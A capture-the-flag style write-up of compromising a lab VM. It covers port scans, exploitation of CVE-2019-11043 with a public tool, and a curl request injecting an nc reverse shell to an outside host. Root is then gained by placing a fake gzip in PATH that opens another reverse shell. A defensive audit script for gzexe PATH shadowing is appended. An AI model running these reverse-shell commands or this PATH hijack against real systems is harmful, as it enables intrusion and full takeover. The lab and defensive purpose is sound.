The target machine's IP is 192.168.56.118

Port scan

sudo nmap --min-rate 10000 -p- 192.168.56.118                 
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 08:38 UTC
Nmap scan report for 192.168.56.118 (192.168.56.118)
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:F7:CE:E7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.45 seconds
sudo nmap -sT -sV -sC -O -p22,80 192.168.56.118                
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 08:38 UTC
Nmap scan report for 192.168.56.118 (192.168.56.118)
Host is up (0.00032s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:4c:af:92:cc:bb:99:59:d7:2f:1b:99:fb:f1:7c:f0 (RSA)
| 256 ba:0d:85:69:43:86:c1:91:7c:db:2a:1e:34:ab:68:1e (ECDSA)
|_ 256 a1:ac:2c:ce:f4:07:da:96:12:74:d1:54:9e:f7:09:04 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:F7:CE:E7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
sudo nmap --script=vuln -p22,80 192.168.56.118
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 08:39 UTC
Nmap scan report for 192.168.56.118 (192.168.56.118)
Host is up (0.00032s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /robots.txt: Robots file
|_ /phpinfo.php: Possible information file
MAC Address: 08:00:27:F7:CE:E7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 72.97 seconds

Getshell

Visiting the root directory shows a blank page, so scan for directories.

/robots.txt: itwasonlyakiss

There is also a phpinfo.php.

No real ideas at this point; after checking the hints, it turns out to be CVE-2019-11043.

Exploit: https://github.com/neex/phuip-fpizdam

./phuip-fpizdam http://192.168.56.118/index.php
2024/02/18 09:04:26 Base status code is 200
2024/02/18 09:04:26 Status code 502 for qsl=1765, adding as a candidate
2024/02/18 09:04:26 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2024/02/18 09:04:26 Attack params found: --qsl 1755 --pisos 38 --skip-detect
2024/02/18 09:04:26 Trying to set "session.auto_start=0"...
2024/02/18 09:04:26 Detect() returned attack params: --qsl 1755 --pisos 38 --skip-detect <-- REMEMBER THIS
2024/02/18 09:04:26 Performing attack using php.ini settings...
2024/02/18 09:04:26 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2024/02/18 09:04:26 Trying to cleanup /tmp/a...
2024/02/18 09:04:26 Done!
curl "http://192.168.56.118/index.php?a=id" -vv    

* Trying 192.168.56.118:80...
* Connected to 192.168.56.118 (192.168.56.118) port 80

> GET /index.php?a=id HTTP/1.1
> Host: 192.168.56.118
> User-Agent: curl/8.3.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.2
< Date: Sun, 18 Feb 2024 09:27:36 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< X-Powered-By: PHP/7.1.33dev
<
uid=33(www-data) gid=33(www-data) groups=33(www-data)

* Connection #0 to host 192.168.56.118 left intact

Start a listener

curl "http://192.168.56.118/index.php?a=id;nc%20-e%20/bin/sh%20192.168.56.102%201234" -vv

Perhaps it's a characteristic of the vulnerability: sometimes curl has to be run several times before the command actually executes.

Privilege escalation

A mysql service is running, and the credentials root:itwasonlyakiss allow logging in.

The user table yields emma's password hash; cracking it gives password.

Well, I got ahead of myself: emma's password is the hash string itself, 5f4dcc3b5aa765d61d8327deb882cf80.

In the home directory there is a who binary along with its who.c source, which calls /bin/id.

sudo -l shows that /usr/bin/gzexe can be run. It is a command for compressing executables, and it overwrites the original file.

sudo -u root /usr/bin/gzexe /bin/id

First compress /bin/id as root, then

strings /bin/id

It contains the following line:

if tail $tail_n +$skip <"$0" | gzip -cd > "$gztmp"; then

The gzip command is invoked by bare name (resolved through PATH), so the PATH environment variable can be hijacked.

echo 'nc -e /bin/sh 192.168.56.102 1234' >gzip
chmod +x gzip
export PATH=/tmp:$PATH

Start a listener and run /home/emma/who; now we are root!
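From the defender's side, the condition exploited above is simple to audit: a gzexe-wrapped binary is a shell stub that resolves gzip and tail through PATH, so any writable directory ahead of the real gzip in the PATH of a privileged caller hands that caller's privileges to whoever writes there. The script below is an added example (not from the original post or from gzexe itself); it checks a file header for the gzexe stub, lists the helpers it resolves by bare name, and reports PATH entries that could shadow them. The header is a constructed sample modelled on the gzexe(1) stub, and real gzip is assumed to live in /bin as on Debian.

```python
#!/usr/bin/env python3
"""Audit a gzexe-style wrapper: which helper commands it resolves through
PATH, and which PATH entries would let a non-root user shadow them.
Runs offline on a constructed header modelled on the gzexe(1) stub."""
import os
import re

GZEXE_MARKERS = ("skip=", "gzip -cd")          # fragments every gzexe stub carries
BARE_CMD_RE = re.compile(r'(?<![\w/.$"])(gzip|tail)\s')  # bare-name invocations
TRUSTED_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin",  # root-only dirs (assumed)
                "/usr/local/bin", "/usr/local/sbin"}

# Constructed sample, abbreviated from the script gzexe(1) prepends to a binary.
SAMPLE_HEADER = b"""#!/bin/sh
skip=44
gztmpdir=
if tail $tail_n +$skip <"$0" | gzip -cd > "$gztmp"; then
"""

def is_gzexe_wrapper(head: bytes) -> bool:
    """True if the file starts like a gzexe self-extracting stub."""
    text = head.decode("utf-8", "replace")
    return text.startswith("#!/bin/sh") and all(m in text for m in GZEXE_MARKERS)

def bare_commands(head: bytes) -> set:
    """Helper commands the stub looks up via PATH rather than by absolute path."""
    return set(BARE_CMD_RE.findall(head.decode("utf-8", "replace")))

def shadowing_entries(path_env: str, real_dir: str) -> list:
    """PATH entries searched before real_dir that are not root-only system
    directories: a fake helper placed in any of them wins the lookup."""
    hits = []
    for entry in path_env.split(":"):
        norm = os.path.normpath(entry) if entry else "."   # empty entry means cwd
        if norm == os.path.normpath(real_dir):
            break
        if norm not in TRUSTED_DIRS:
            hits.append(entry or "<empty: cwd>")
    return hits

def audit(head: bytes, path_env: str, real_dir: str = "/bin") -> list:
    """Findings for one wrapper under the given PATH; an empty list means clean."""
    if not is_gzexe_wrapper(head):
        return []
    risky = shadowing_entries(path_env, real_dir)
    return [f"{c} resolved via PATH; shadowable from {d}"
            for c in sorted(bare_commands(head)) for d in risky]
```

Calling audit(SAMPLE_HEADER, "/tmp:/usr/bin:/bin") reproduces the writeup's situation and flags /tmp for both gzip and tail, while the same header under a PATH that starts at /usr/bin returns no findings; on a live host, feed it the first kilobyte of each binary that sudo or a setuid program may execute.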

Rambling

I'm not especially familiar with CVE-2019-11043; I'll probably reproduce it properly later. The privilege escalation was a lot of fun too!